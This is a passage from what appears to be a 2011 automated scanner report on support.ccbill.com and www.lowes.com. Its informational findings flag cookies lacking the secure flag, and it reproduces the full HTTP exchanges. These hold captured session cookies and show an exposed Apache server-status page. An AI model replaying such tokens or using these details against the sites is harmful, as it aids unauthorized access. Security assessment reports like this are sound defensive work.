User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 19:01:46 GMT
ETag: "16756d-2e-48fc4251f1a80"
Accept-Ranges: bytes
Content-Length: 46
X-Cnection: close
Content-Type: image/gif
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

GIF89a.............!.......,.................;

7.105. https://support.ccbill.com/style/img/sprites/page_elements.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/sprites/page_elements.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/sprites/page_elements.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:23 GMT
Last-Modified: Wed, 08 Sep 2010 19:03:23 GMT
ETag: "13c85c-2b19-48fc42ae734c0"
Accept-Ranges: bytes
Content-Length: 11033
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.."6...R.....Py......PLTE).....................................................<^..........................y.................................(........).........................UV....t
...[SNIP]...

7.106. https://www.lowes.com/server-status

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /server-status

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server-status HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; stop_mobi=yes; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 21:32:27 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:02:26 GMT
Set-Cookie: TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c; Path=/
Content-Length: 353323

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.lowes.com</h1>

<dl><dt>Server Version: IBM_HTTP_Server
...[SNIP]...

7.107. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main.css HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 238055
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* Reset CSS */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img
...[SNIP]...

7.108. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 11:20:33 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60109
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
* common.js
* Common javascript to be run on every page of the Lowes.com web site.
*
* Copyright Lowes, Inc.
*
* Last Modified On 03/04/2010
* Modified By R. Adams
*/

var lowes=
...[SNIP]...

7.109. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jul 2009 13:05:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 154101
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.110. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Oct 2010 17:00:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 72756
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.111. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
